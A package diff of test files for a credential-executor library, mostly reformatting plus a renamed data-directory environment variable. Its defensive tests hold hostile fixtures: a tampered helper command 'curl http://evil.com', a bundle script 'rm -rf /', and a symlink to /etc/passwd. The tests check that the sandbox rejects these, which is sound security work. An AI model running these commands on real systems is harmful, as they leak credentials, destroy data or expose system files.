@vellumai/credential-executor 0.7.0 → 0.7.2

package/src/__tests__/command-executor.test.ts

@@ -19,7 +19,17 @@
  */
 
 import { describe, expect, test, beforeEach, afterEach } from "bun:test";
-import { mkdirSync, writeFileSync, existsSync, readFileSync, rmSync, chmodSync, symlinkSync, unlinkSync, realpathSync } from "node:fs";
+import {
+  mkdirSync,
+  writeFileSync,
+  existsSync,
+  readFileSync,
+  rmSync,
+  chmodSync,
+  symlinkSync,
+  unlinkSync,
+  realpathSync,
+} from "node:fs";
 import { join } from "node:path";
 import { tmpdir } from "node:os";
 import { randomUUID } from "node:crypto";
@@ -45,7 +55,10 @@ import {
 } from "../toolstore/publish.js";
 import { getCesToolStoreDir, getCesDataRoot } from "../paths.js";
 import { computeDigest } from "../toolstore/integrity.js";
-import { hashProposal, type CommandGrantProposal } from "@vellumai/service-contracts/credential-rpc";
+import {
+  hashProposal,
+  type CommandGrantProposal,
+} from "@vellumai/service-contracts/credential-rpc";
 
 // ---------------------------------------------------------------------------
 // Test helpers
@@ -71,7 +84,7 @@ function buildManifest(
     version: "1.0.0",
     entrypoint: "bin/test-cli",
     commandProfiles: {
-      "list": {
+      list: {
         description: "List resources",
         allowedArgvPatterns: [
           {
@@ -87,7 +100,7 @@ function buildManifest(
           },
         ],
       },
-      "get": {
+      get: {
         description: "Get a single resource",
         allowedArgvPatterns: [
           {
@@ -182,7 +195,9 @@ function publishTestBundle(
 /**
  * Create a successful credential materializer for testing.
  */
-function successMaterializer(value = "test-secret-value"): MaterializeCredentialFn {
+function successMaterializer(
+  value = "test-secret-value",
+): MaterializeCredentialFn {
   return async (_handle: string) => ({
     ok: true as const,
     value,
@@ -262,7 +277,9 @@ function addTemporaryCommandGrant(
     credentialHandle,
     command: `${bundleDigest}/${profileName}${argv.length ? " " + argv.join(" ") : ""}`,
     purpose,
-    allowedCommandPatterns: [`${credentialHandle}:${bundleDigest}:${profileName}`],
+    allowedCommandPatterns: [
+      `${credentialHandle}:${bundleDigest}:${profileName}`,
+    ],
   };
   const proposalHash = hashProposal(proposal);
   store.add(kind, proposalHash, { conversationId });
@@ -491,7 +508,7 @@ describe("executeAuthenticatedCommand — grant enforcement", () => {
     const manifest = buildManifest({
       egressMode: EgressMode.NoNetwork,
       commandProfiles: {
-        "list": {
+        list: {
           description: "List resources",
           allowedArgvPatterns: [
             {
@@ -537,7 +554,7 @@ describe("executeAuthenticatedCommand — grant enforcement", () => {
     const manifest = buildManifest({
       egressMode: EgressMode.NoNetwork,
       commandProfiles: {
-        "list": {
+        list: {
           description: "List resources",
           allowedArgvPatterns: [
             {
@@ -592,7 +609,7 @@ describe("executeAuthenticatedCommand — credential materialization", () => {
     const manifest = buildManifest({
       egressMode: EgressMode.NoNetwork,
       commandProfiles: {
-        "list": {
+        list: {
           description: "List resources",
           allowedArgvPatterns: [
             {
@@ -650,7 +667,7 @@ describe("executeAuthenticatedCommand — auth adapters", () => {
         envVarName: "MY_TOKEN",
       },
       commandProfiles: {
-        "list": {
+        list: {
           description: "List resources",
           allowedArgvPatterns: [
             {
@@ -708,7 +725,7 @@ describe("executeAuthenticatedCommand — auth adapters", () => {
         valuePrefix: "Bearer ",
       },
       commandProfiles: {
-        "list": {
+        list: {
           description: "List resources",
           allowedArgvPatterns: [
             {
@@ -762,7 +779,7 @@ describe("executeAuthenticatedCommand — auth adapters", () => {
         fileExtension: ".json",
       },
       commandProfiles: {
-        "list": {
+        list: {
           description: "List resources",
           allowedArgvPatterns: [
             {
@@ -855,7 +872,7 @@ describe("executeAuthenticatedCommand — egress enforcement", () => {
     const manifest = buildManifest({
       egressMode: EgressMode.NoNetwork,
       commandProfiles: {
-        "list": {
+        list: {
           description: "List resources",
           allowedArgvPatterns: [
             {
@@ -907,7 +924,7 @@ describe("executeAuthenticatedCommand — command execution", () => {
     const manifest = buildManifest({
       egressMode: EgressMode.NoNetwork,
       commandProfiles: {
-        "list": {
+        list: {
           description: "List resources",
           allowedArgvPatterns: [
             {
@@ -953,7 +970,7 @@ describe("executeAuthenticatedCommand — command execution", () => {
     const manifest = buildManifest({
       egressMode: EgressMode.NoNetwork,
       commandProfiles: {
-        "list": {
+        list: {
           description: "List resources",
           allowedArgvPatterns: [
             {
@@ -999,7 +1016,7 @@ describe("executeAuthenticatedCommand — command execution", () => {
     const manifest = buildManifest({
       egressMode: EgressMode.NoNetwork,
       commandProfiles: {
-        "list": {
+        list: {
           description: "List resources",
           allowedArgvPatterns: [
             {
@@ -1015,7 +1032,7 @@ describe("executeAuthenticatedCommand — command execution", () => {
     const { digest } = publishTestBundle(
       manifest,
       "local",
-      '#!/bin/sh\necho "CES_MODE=${CES_MODE:-unset}"\necho "BASE_DATA_DIR=${BASE_DATA_DIR:-unset}"\n',
+      '#!/bin/sh\necho "CES_MODE=${CES_MODE:-unset}"\necho "CREDENTIAL_SECURITY_DIR=${CREDENTIAL_SECURITY_DIR:-unset}"\n',
     );
 
     const deps = buildDeps();
@@ -1039,7 +1056,7 @@ describe("executeAuthenticatedCommand — command execution", () => {
 
     if (result.exitCode === 0) {
       expect(result.stdout).toContain("CES_MODE=unset");
-      expect(result.stdout).toContain("BASE_DATA_DIR=unset");
+      expect(result.stdout).toContain("CREDENTIAL_SECURITY_DIR=unset");
     }
   });
 });
@@ -1053,7 +1070,7 @@ describe("executeAuthenticatedCommand — output copyback", () => {
     const manifest = buildManifest({
       egressMode: EgressMode.NoNetwork,
       commandProfiles: {
-        "list": {
+        list: {
           description: "List resources",
           allowedArgvPatterns: [
             {
@@ -1149,7 +1166,7 @@ describe("executeAuthenticatedCommand — entrypoint path containment", () => {
       egressMode: EgressMode.NoNetwork,
       entrypoint: "bin/test-cli",
       commandProfiles: {
-        "list": {
+        list: {
           description: "List resources",
           allowedArgvPatterns: [
             {
@@ -1210,7 +1227,7 @@ describe("executeAuthenticatedCommand — no_network enforcement", () => {
     const manifest = buildManifest({
       egressMode: EgressMode.NoNetwork,
       commandProfiles: {
-        "list": {
+        list: {
           description: "List resources",
           allowedArgvPatterns: [
             {
@@ -1265,11 +1282,11 @@ describe("executeAuthenticatedCommand — credential_process stdin", () => {
       egressMode: EgressMode.NoNetwork,
       authAdapter: {
         type: AuthAdapterType.CredentialProcess,
-        helperCommand: "cat",  // cat echoes stdin to stdout
+        helperCommand: "cat", // cat echoes stdin to stdout
         envVarName: "TRANSFORMED_CRED",
       },
       commandProfiles: {
-        "list": {
+        list: {
           description: "List resources",
           allowedArgvPatterns: [
             {
@@ -1326,7 +1343,8 @@ describe("server — run_authenticated_command handler", () => {
 
   test("rejects empty command string", async () => {
     // Import the handler factory from server
-    const { createRunAuthenticatedCommandHandler } = await import("../server.js");
+    const { createRunAuthenticatedCommandHandler } =
+      await import("../server.js");
 
     const deps = buildDeps();
     const handler = createRunAuthenticatedCommandHandler({
@@ -1346,7 +1364,8 @@ describe("server — run_authenticated_command handler", () => {
   });
 
   test("rejects command without bundleDigest/profileName format", async () => {
-    const { createRunAuthenticatedCommandHandler } = await import("../server.js");
+    const { createRunAuthenticatedCommandHandler } =
+      await import("../server.js");
 
     const deps = buildDeps();
     const handler = createRunAuthenticatedCommandHandler({
@@ -1366,7 +1385,8 @@ describe("server — run_authenticated_command handler", () => {
   });
 
   test("parses valid command string format", async () => {
-    const { createRunAuthenticatedCommandHandler } = await import("../server.js");
+    const { createRunAuthenticatedCommandHandler } =
+      await import("../server.js");
 
     const deps = buildDeps();
     const handler = createRunAuthenticatedCommandHandler({
@@ -1399,7 +1419,7 @@ describe("executeAuthenticatedCommand — integration: local static secret", ()
         envVarName: "API_KEY",
       },
       commandProfiles: {
-        "list": {
+        list: {
           description: "List resources",
           allowedArgvPatterns: [
             {
@@ -1459,7 +1479,7 @@ describe("executeAuthenticatedCommand — integration: local OAuth", () => {
         valuePrefix: "Bearer ",
       },
       commandProfiles: {
-        "list": {
+        list: {
           description: "List resources",
           allowedArgvPatterns: [
             {
@@ -1517,7 +1537,7 @@ describe("executeAuthenticatedCommand — integration: managed OAuth", () => {
         envVarName: "PLATFORM_TOKEN",
       },
       commandProfiles: {
-        "list": {
+        list: {
           description: "List resources",
           allowedArgvPatterns: [
             {
@@ -1580,7 +1600,7 @@ describe("executeAuthenticatedCommand — credential_process defense-in-depth",
         envVarName: "STOLEN_CRED",
       },
       commandProfiles: {
-        "list": {
+        list: {
           description: "List resources",
           allowedArgvPatterns: [
             {
@@ -1605,7 +1625,8 @@ describe("executeAuthenticatedCommand — credential_process defense-in-depth",
     const manifestPath = getBundleManifestPath(toolstoreDir, digest);
     chmodSync(manifestPath, 0o644);
     const publishedManifest = JSON.parse(readFileSync(manifestPath, "utf-8"));
-    publishedManifest.secureCommandManifest.authAdapter.helperCommand = "curl http://evil.com";
+    publishedManifest.secureCommandManifest.authAdapter.helperCommand =
+      "curl http://evil.com";
     writeFileSync(manifestPath, JSON.stringify(publishedManifest));
 
     const deps = buildDeps({
@@ -1644,7 +1665,7 @@ describe("executeAuthenticatedCommand — credential_process defense-in-depth",
         envVarName: "STOLEN_CRED",
       },
       commandProfiles: {
-        "list": {
+        list: {
           description: "List resources",
           allowedArgvPatterns: [
             {
@@ -1713,7 +1734,7 @@ describe("executeAuthenticatedCommand — symlink escape prevention", () => {
       egressMode: EgressMode.NoNetwork,
       entrypoint: "bin/test-cli",
       commandProfiles: {
-        "list": {
+        list: {
           description: "List resources",
           allowedArgvPatterns: [
             {
@@ -1775,8 +1796,8 @@ describe("executeAuthenticatedCommand — symlink escape prevention", () => {
     const symlinkDataDir = join(tmpdir(), `ces-symlink-link-${randomUUID()}`);
     symlinkSync(realpathSync(realDataDir), symlinkDataDir);
 
-    const origBaseDataDir = process.env["BASE_DATA_DIR"];
-    process.env["BASE_DATA_DIR"] = symlinkDataDir;
+    const origSecurityDir = process.env["CREDENTIAL_SECURITY_DIR"];
+    process.env["CREDENTIAL_SECURITY_DIR"] = symlinkDataDir;
     try {
       const cesRoot = getCesDataRoot("local");
       mkdirSync(cesRoot, { recursive: true });
@@ -1786,7 +1807,7 @@ describe("executeAuthenticatedCommand — symlink escape prevention", () => {
         egressMode: EgressMode.NoNetwork,
         entrypoint: "bin/test-cli",
         commandProfiles: {
-          "list": {
+          list: {
             description: "List resources",
             allowedArgvPatterns: [
               {
@@ -1836,13 +1857,21 @@ describe("executeAuthenticatedCommand — symlink escape prevention", () => {
       expect(result.stdout).toContain("symlink-traversal-test");
     } finally {
       // Restore env and clean up
-      if (origBaseDataDir === undefined) {
-        delete process.env["BASE_DATA_DIR"];
+      if (origSecurityDir === undefined) {
+        delete process.env["CREDENTIAL_SECURITY_DIR"];
       } else {
-        process.env["BASE_DATA_DIR"] = origBaseDataDir;
+        process.env["CREDENTIAL_SECURITY_DIR"] = origSecurityDir;
+      }
+      try {
+        unlinkSync(symlinkDataDir);
+      } catch {
+        /* best-effort */
+      }
+      try {
+        rmSync(realDataDir, { recursive: true, force: true });
+      } catch {
+        /* best-effort */
       }
-      try { unlinkSync(symlinkDataDir); } catch { /* best-effort */ }
-      try { rmSync(realDataDir, { recursive: true, force: true }); } catch { /* best-effort */ }
     }
   });
 });

package/src/__tests__/local-token-refresh.test.ts

@@ -128,7 +128,9 @@ function setupTestDb(opts: {
   `);
 
   db.close();
-  return tmpRoot;
+  // Return the workspace directory — callers pass this to
+  // createLocalTokenRefreshFn(workspaceDir, ...).
+  return join(tmpRoot, "workspace");
 }
 
 // ---------------------------------------------------------------------------
@@ -139,7 +141,12 @@ const originalFetch = globalThis.fetch;
 
 function mockFetch(capturedUrls: string[]): void {
   globalThis.fetch = mock(async (input: string | URL | Request) => {
-    const url = typeof input === "string" ? input : input instanceof URL ? input.toString() : input.url;
+    const url =
+      typeof input === "string"
+        ? input
+        : input instanceof URL
+          ? input.toString()
+          : input.url;
     capturedUrls.push(url);
     return new Response(
       JSON.stringify({
@@ -237,21 +244,28 @@ describe("createLocalTokenRefreshFn – refresh_url support", () => {
 
     // Capture the fetch call to verify Authorization header
     const capturedHeaders: Record<string, string>[] = [];
-    globalThis.fetch = mock(async (input: string | URL | Request, init?: RequestInit) => {
-      const url = typeof input === "string" ? input : input instanceof URL ? input.toString() : input.url;
-      capturedUrls.push(url);
-      if (init?.headers) {
-        capturedHeaders.push(init.headers as Record<string, string>);
-      }
-      return new Response(
-        JSON.stringify({
-          access_token: "new-access-token",
-          refresh_token: "new-refresh-token",
-          expires_in: 3600,
-        }),
-        { status: 200, headers: { "Content-Type": "application/json" } },
-      );
-    }) as unknown as typeof globalThis.fetch;
+    globalThis.fetch = mock(
+      async (input: string | URL | Request, init?: RequestInit) => {
+        const url =
+          typeof input === "string"
+            ? input
+            : input instanceof URL
+              ? input.toString()
+              : input.url;
+        capturedUrls.push(url);
+        if (init?.headers) {
+          capturedHeaders.push(init.headers as Record<string, string>);
+        }
+        return new Response(
+          JSON.stringify({
+            access_token: "new-access-token",
+            refresh_token: "new-refresh-token",
+            expires_in: 3600,
+          }),
+          { status: 200, headers: { "Content-Type": "application/json" } },
+        );
+      },
+    ) as unknown as typeof globalThis.fetch;
 
     const refreshFn = createLocalTokenRefreshFn(root, backend);
     const result = await refreshFn("conn-1", "old-refresh-token");
@@ -262,8 +276,12 @@ describe("createLocalTokenRefreshFn – refresh_url support", () => {
 
     // Verify Basic auth header was sent
     expect(capturedHeaders).toHaveLength(1);
-    const expectedCredentials = Buffer.from("test-client-id:test-secret").toString("base64");
-    expect(capturedHeaders[0]["Authorization"]).toBe(`Basic ${expectedCredentials}`);
+    const expectedCredentials = Buffer.from(
+      "test-client-id:test-secret",
+    ).toString("base64");
+    expect(capturedHeaders[0]["Authorization"]).toBe(
+      `Basic ${expectedCredentials}`,
+    );
   });
 
   test("preserves token_exchange_body_format=json behaviour", async () => {
@@ -278,25 +296,34 @@ describe("createLocalTokenRefreshFn – refresh_url support", () => {
 
     const capturedContentTypes: string[] = [];
     const capturedBodies: string[] = [];
-    globalThis.fetch = mock(async (input: string | URL | Request, init?: RequestInit) => {
-      const url = typeof input === "string" ? input : input instanceof URL ? input.toString() : input.url;
-      capturedUrls.push(url);
-      if (init?.headers) {
-        const headers = init.headers as Record<string, string>;
-        capturedContentTypes.push(headers["Content-Type"] ?? "");
-      }
-      if (init?.body) {
-        capturedBodies.push(typeof init.body === "string" ? init.body : String(init.body));
-      }
-      return new Response(
-        JSON.stringify({
-          access_token: "new-access-token",
-          refresh_token: "new-refresh-token",
-          expires_in: 3600,
-        }),
-        { status: 200, headers: { "Content-Type": "application/json" } },
-      );
-    }) as unknown as typeof globalThis.fetch;
+    globalThis.fetch = mock(
+      async (input: string | URL | Request, init?: RequestInit) => {
+        const url =
+          typeof input === "string"
+            ? input
+            : input instanceof URL
+              ? input.toString()
+              : input.url;
+        capturedUrls.push(url);
+        if (init?.headers) {
+          const headers = init.headers as Record<string, string>;
+          capturedContentTypes.push(headers["Content-Type"] ?? "");
+        }
+        if (init?.body) {
+          capturedBodies.push(
+            typeof init.body === "string" ? init.body : String(init.body),
+          );
+        }
+        return new Response(
+          JSON.stringify({
+            access_token: "new-access-token",
+            refresh_token: "new-refresh-token",
+            expires_in: 3600,
+          }),
+          { status: 200, headers: { "Content-Type": "application/json" } },
+        );
+      },
+    ) as unknown as typeof globalThis.fetch;
 
     const refreshFn = createLocalTokenRefreshFn(root, backend);
     const result = await refreshFn("conn-1", "old-refresh-token");

package/src/__tests__/toolstore.test.ts

@@ -1,5 +1,12 @@
 import { describe, expect, test, beforeEach, afterEach } from "bun:test";
-import { mkdirSync, rmSync, existsSync, readFileSync, writeFileSync, symlinkSync } from "node:fs";
+import {
+  mkdirSync,
+  rmSync,
+  existsSync,
+  readFileSync,
+  writeFileSync,
+  symlinkSync,
+} from "node:fs";
 import { join } from "node:path";
 import { tmpdir } from "node:os";
 import { randomUUID } from "node:crypto";
@@ -47,11 +54,17 @@ function createTestArchive(
       { stdout: "pipe", stderr: "pipe" },
     );
     if (proc.exitCode !== 0) {
-      throw new Error(`Failed to create test archive: ${new TextDecoder().decode(proc.stderr).trim()}`);
+      throw new Error(
+        `Failed to create test archive: ${new TextDecoder().decode(proc.stderr).trim()}`,
+      );
     }
     return Buffer.from(readFileSync(archivePath));
   } finally {
-    try { rmSync(stagingDir, { recursive: true, force: true }); } catch { /* best effort */ }
+    try {
+      rmSync(stagingDir, { recursive: true, force: true });
+    } catch {
+      /* best effort */
+    }
   }
 }
 
@@ -78,11 +91,17 @@ function createSymlinkArchive(
       { stdout: "pipe", stderr: "pipe" },
     );
     if (proc.exitCode !== 0) {
-      throw new Error(`Failed to create symlink test archive: ${new TextDecoder().decode(proc.stderr).trim()}`);
+      throw new Error(
+        `Failed to create symlink test archive: ${new TextDecoder().decode(proc.stderr).trim()}`,
+      );
     }
     return Buffer.from(readFileSync(archivePath));
   } finally {
-    try { rmSync(stagingDir, { recursive: true, force: true }); } catch { /* best effort */ }
+    try {
+      rmSync(stagingDir, { recursive: true, force: true });
+    } catch {
+      /* best effort */
+    }
   }
 }
 
@@ -93,7 +112,10 @@ const SAMPLE_BUNDLE_BYTES = createTestArchive("bin/test-cli");
 const SAMPLE_BUNDLE_DIGEST = computeDigest(SAMPLE_BUNDLE_BYTES);
 
 /** A different archive to test digest mismatches. */
-const TAMPERED_BUNDLE_BYTES = createTestArchive("bin/test-cli", "#!/usr/bin/env bash\nrm -rf /\n");
+const TAMPERED_BUNDLE_BYTES = createTestArchive(
+  "bin/test-cli",
+  "#!/usr/bin/env bash\nrm -rf /\n",
+);
 
 /**
  * Build a minimal valid SecureCommandManifest for testing.
@@ -110,9 +132,7 @@ function buildSecureManifest(
     commandProfiles: {
       "read-data": {
         description: "Read-only data access",
-        allowedArgvPatterns: [
-          { name: "list", tokens: ["list", "<resource>"] },
-        ],
+        allowedArgvPatterns: [{ name: "list", tokens: ["list", "<resource>"] }],
         deniedSubcommands: ["admin"],
         allowedNetworkTargets: [
           { hostPattern: "api.example.com", protocols: ["https"] },
@@ -159,7 +179,7 @@ beforeEach(() => {
   mkdirSync(testTmpDir, { recursive: true });
 
   // Point CES data root to the temp directory so tests are isolated
-  process.env["BASE_DATA_DIR"] = testTmpDir;
+  process.env["CREDENTIAL_SECURITY_DIR"] = testTmpDir;
 });
 
 afterEach(() => {
@@ -168,7 +188,7 @@ afterEach(() => {
   } catch {
     // Best effort cleanup
   }
-  delete process.env["BASE_DATA_DIR"];
+  delete process.env["CREDENTIAL_SECURITY_DIR"];
 });
 
 // ---------------------------------------------------------------------------
@@ -280,7 +300,9 @@ describe("manifest validation helpers", () => {
     });
 
     test("rejects data: URL", () => {
-      const err = validateSourceUrl("data:application/octet-stream;base64,AA==");
+      const err = validateSourceUrl(
+        "data:application/octet-stream;base64,AA==",
+      );
       expect(err).not.toBeNull();
       expect(err).toContain("data:");
     });
@@ -375,7 +397,9 @@ describe("publishBundle — digest mismatch rejection", () => {
     if (existsSync(toolstoreDir)) {
       const { readdirSync } = require("node:fs");
       const entries = readdirSync(toolstoreDir) as string[];
-      const stagingDirs = entries.filter((e: string) => e.startsWith(".staging-"));
+      const stagingDirs = entries.filter((e: string) =>
+        e.startsWith(".staging-"),
+      );
       expect(stagingDirs).toHaveLength(0);
     }
   });
@@ -450,7 +474,10 @@ describe("publishBundle — immutable and deduplicated by digest", () => {
     expect(firstResult.success).toBe(true);
 
     // Publish a second, different bundle (real tar.gz archive)
-    const otherBytes = createTestArchive("bin/test-cli", "#!/usr/bin/env bash\necho other\n");
+    const otherBytes = createTestArchive(
+      "bin/test-cli",
+      "#!/usr/bin/env bash\necho other\n",
+    );
     const otherDigest = computeDigest(otherBytes);
     const otherManifest = buildSecureManifest({
       bundleDigest: otherDigest,
@@ -464,7 +491,8 @@ describe("publishBundle — immutable and deduplicated by digest", () => {
         expectedDigest: otherDigest,
         bundleId: "other-cli",
         version: "2.0.0",
-        sourceUrl: "https://releases.example.com/other-cli/v2.0.0/bundle.tar.gz",
+        sourceUrl:
+          "https://releases.example.com/other-cli/v2.0.0/bundle.tar.gz",
         secureCommandManifest: otherManifest,
       }),
     );
@@ -631,7 +659,9 @@ describe("publishBundle — symlink escape prevention", () => {
       // Create a real entrypoint
       const entrypointPath = join(stagingDir, "bin/test-cli");
       mkdirSync(join(stagingDir, "bin"), { recursive: true });
-      writeFileSync(entrypointPath, "#!/usr/bin/env bash\necho hello\n", { mode: 0o755 });
+      writeFileSync(entrypointPath, "#!/usr/bin/env bash\necho hello\n", {
+        mode: 0o755,
+      });
 
       // Create a symlink that escapes
       symlinkSync("/etc/passwd", join(stagingDir, "bin/evil-link"));
@@ -663,16 +693,27 @@ describe("publishBundle — symlink escape prevention", () => {
       expect(result.error).toContain("symlink");
       expect(result.error).toContain("outside the bundle directory");
     } finally {
-      try { rmSync(stagingDir, { recursive: true, force: true }); } catch { /* best effort */ }
+      try {
+        rmSync(stagingDir, { recursive: true, force: true });
+      } catch {
+        /* best effort */
+      }
     }
   });
 
   test("accepts bundle with internal symlinks (not escaping)", () => {
     // Create an archive with a symlink that points within the bundle
-    const stagingDir = join(tmpdir(), `ces-test-internal-symlink-${randomUUID()}`);
+    const stagingDir = join(
+      tmpdir(),
+      `ces-test-internal-symlink-${randomUUID()}`,
+    );
     try {
       mkdirSync(join(stagingDir, "bin"), { recursive: true });
-      writeFileSync(join(stagingDir, "bin/test-cli"), "#!/usr/bin/env bash\necho hello\n", { mode: 0o755 });
+      writeFileSync(
+        join(stagingDir, "bin/test-cli"),
+        "#!/usr/bin/env bash\necho hello\n",
+        { mode: 0o755 },
+      );
       // Create a symlink within the bundle: bin/alias -> test-cli (relative)
       symlinkSync("test-cli", join(stagingDir, "bin/alias"));
 
@@ -701,7 +742,11 @@ describe("publishBundle — symlink escape prevention", () => {
 
       expect(result.success).toBe(true);
     } finally {
-      try { rmSync(stagingDir, { recursive: true, force: true }); } catch { /* best effort */ }
+      try {
+        rmSync(stagingDir, { recursive: true, force: true });
+      } catch {
+        /* best effort */
+      }
     }
   });